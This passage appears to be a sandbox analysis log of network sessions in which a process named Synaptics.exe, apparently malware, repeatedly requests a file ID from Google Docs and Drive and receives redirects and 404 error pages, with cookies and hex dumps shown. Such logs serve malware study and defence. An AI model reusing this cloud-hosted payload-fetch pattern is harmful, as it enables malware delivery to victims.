                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              31192.168.2.849772216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:31 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=VL_GHZV1e_y-7-YB2QhgR7m41cVMxQehDrS9YBmiQePvr4mGlbgJWI4frSdZlJpHQfJBXPaJRMtMOz-UlrnyXePV6GErcwoBgK_mJp59isaoCyA6TPNmmXhLo_HbqvVx5bRNbysM9xEJdnROQz30aVMRuLtW1PCVTQponmnCmpzk3I1sm9gCaXPs
                                                                                                              2024-12-30 10:25:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UR54LSC-Yd4SxpIc32s5Kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              32192.168.2.849771172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:31 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:32 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7e9H7ozF1IkuFVQd2cuI6EycA4afrGB52MLfoXKOe8nHrYyS6SnnbFSTWVlObWWvms
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Qjy_facuBzRPZ7xk7SbkvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:32 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:32 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 70 59 73 55 78 48 56 39 52 65 31 46 6b 6a 31 64 41 67 44 47 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="OpYsUxHV9Re1Fkj1dAgDGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:32 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              33192.168.2.849774216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:31 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=VL_GHZV1e_y-7-YB2QhgR7m41cVMxQehDrS9YBmiQePvr4mGlbgJWI4frSdZlJpHQfJBXPaJRMtMOz-UlrnyXePV6GErcwoBgK_mJp59isaoCyA6TPNmmXhLo_HbqvVx5bRNbysM9xEJdnROQz30aVMRuLtW1PCVTQponmnCmpzk3I1sm9gCaXPs
                                                                                                              2024-12-30 10:25:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Bq8uJJAvtezTYgiolman9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              34192.168.2.849773172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:31 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:32 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC496NTgK6h3xMyBqWSTOASkXSKl3GnDYd9nasW8WRII1hElLU3ClkdR9bSe5uRUGiUAG82Nhp4
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-mYgoKkz3iu8UGoANOzWn6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:32 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:25:32 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 63 42 6a 4a 49 5f 46 68 33 7a 66 71 59 57 46 33 59 56 74 52 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="5cBjJI_Fh3zfqYWF3YVtRA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:25:32 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              35192.168.2.849776216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:32 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-AN4gKJo9x9RiRluab330iQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              36192.168.2.849777216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:32 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-wPdbpHILCcE6JjrWEaR5ZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              37192.168.2.849778172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:32 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:33 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5jmVxbhKzSUIIMFEX3ZytixDiL3pADFVe1hXbxbncX_zXYotPCkL30PeGkRSTsKXg4
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-14sotBtS7tYQzdxzS66IRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:33 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:33 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 4c 69 2d 53 39 55 4a 49 71 6f 74 4e 72 4a 4f 5f 48 79 4c 78 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="oLi-S9UJIqotNrJO_HyLxA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:33 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              38192.168.2.849779172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:32 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:33 UTC1243INHTTP/1.1 404 Not Found
